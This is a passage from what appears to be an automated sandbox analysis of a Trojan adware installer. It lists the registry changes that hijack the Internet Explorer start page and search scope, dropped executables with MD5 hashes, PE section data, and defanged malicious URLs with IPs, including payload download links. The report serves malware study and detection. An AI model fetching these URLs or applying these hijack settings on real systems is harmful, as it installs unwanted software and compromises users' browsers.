"DefaultScope" = "{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"51652492" = "///%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD/SxAm/Ch/VP/v/YD/OP////%%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"ef34a9f6" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"URL" = "websearch.coolfindings.info/?l=1&q={searchTerms}&pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "websearch.coolfindings.info/?pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"URL" = "websearch.coolfindings.info/?l=1&q={searchTerms}&pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"fd0dde78" = "dlAB/DZ/Ml/h/DP/QP/ /Ct/UPAB/DV/M/AC/Bh/M//e/Cb/Vx/i/Ct/PPAC/CP/UP/1/CV/Vl/e/CJ/Qx/1/CD/PlAX/DF/QPA7////"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted"

Dropped PE files

MD5 File path
5b4046db8f3c698418f9b2b51d8c292f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe
2d3705d26f35d66e26b7300384bc01dc c:\Program Files\CutThePrIcE\F9Kz7xj8t8M4Vo.dll
2e1bb4d22880abbf5df8f4343e16c356 c:\Program Files\CutThePrIcE\F9Kz7xj8t8M4Vo.exe
c9456944ec1989ab0e2bf9e23df1c952 c:\Program Files\CutaThePrice\CutaThePrice.exe
f3cf89605ef83f1f6e4ffbfb8b6cef70 c:\Program Files\TerminusKeeper\TerminusKeeper.dll
635d528b505f4ffa3a6b4aea855c5001 c:\Program Files\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe
6e7027aac3d75239fa9684eb5a8863c4 c:\Program Files\bestadblocker\tEp7pMPAVoxXWr.dll
34b46fb135e5264c60ddcf36b0c718bd c:\Program Files\bestadblocker\tEp7pMPAVoxXWr.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 47280 47616 4.40241 37d612d6a9acb8f84028f2746ecfb55f
.rdata 53248 141036 141312 5.41827 592d08be8b4356e664ca45751ece4f2c
.data 196608 28948 21504 0.904746 8c041560eefe8cbc360ca9f34a66f7b9
.rsrc 229376 17904 17920 4.42194 70bd0d0b9733e9bf46a2af29c22a6241
.reloc 249856 4766 5120 3.19352 cac48ca405a5247f77ff5eb0ad24c76c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://r1.the-invention.org/ 54.148.216.39
hxxp://r1.the-invention.org/?step_id=3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://r1.the-invention.org/?step_id=4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://r1.the-invention.org/?step_id=4_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://r1.the-invention.org/?step_id=4_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://r1.the-invention.org/?step_id=4_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://r1.the-invention.org/?step_id=5&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://r1.the-invention.org/?step_id=6&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://r1.the-invention.org/?step_id=6_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://multipledirect.ru/?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&dd=4&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 54.149.75.132
hxxp://r1.the-invention.org/?step_id=6_1_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://multipledirect.ru/?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 54.149.75.132
hxxp://r1.the-invention.org/?step_id=6_1_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://multipledirect.ru/?e=ytr&cht=2&dd=19&clsb=1&publisher=24379&country=UA&prv=bestadblocker&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 54.149.75.132
hxxp://r1.the-invention.org/?step_id=6_1_4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://multipledirect.ru/?e=bsp&clsb=1&publisher=24379&country=UA&dd=5&cid=334&vn=158&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 54.149.75.132
hxxp://r1.the-invention.org/?step_id=6_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://artstickerios.info/2052/TerminusKeeper_143462550383614.ca 54.69.74.195
hxxp://techine.info/get/?data=X78R3fMJAwzVd3H678kNunVp8V2hy/MaNDVsyZviAVqUqjrH5ck2U5rxjd9CME1q/vRUebLuJ4gzt88MkyVCj4gkxrhTS3B1YdjGjV8gH7XkOuh9ahoqAMln6cbQXtJ7J+Cvlf6U4jESk+d1WJIMs+v1kvqLnq2E4QkjYp2oEA7gUDnT2juDYdGkj0Xidb77LHfOSUSz17gfggP//o0tfzmnzmKJmHXJWq8zF04py+O65cCfxslm7EIZk5SLjkyYLRw/4pUUeiwhfSIXe9gPZzy/Q8Mco3sB7HIxiWfTZdfpFYvqY3FtQ1V6+WryJeOikvizLXWStExhAKMrHdivTiqjEQHU54xDXbD5swbLVCzWpMUaIGZSU+Soqr4nGFC0LI0rIhMvXSuwZMZsMjB5DindQWf8is4ytFhtlSNxkwxVoREupyRPVZ7Wf2V5fKlOLxBTI8LpQuBE5tEGIORu1ELgKHLdRapFmsIfcWyPL9bRWFc1Qi/taCUAj+Y4w/tbwTQYv+pd6BV0Isu67h4xUqBuaJdl0m53GADkFUevx23lFBKPUJ6qeUKsK/0U51YvUlw7Fg64kF37NPJecdzX7GbWlGqTOuoFVvPu1tQccEef&version=4 52.26.11.145
hxxp://r1.the-invention.org/?step_id=6_2_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://r1.the-invention.org/?step_id=7&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://i1.scanwebresolver.com/addons/sinstall.exe 54.191.15.203
hxxp://c1.goody-best.info/?step_id=6_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=6&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=4_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
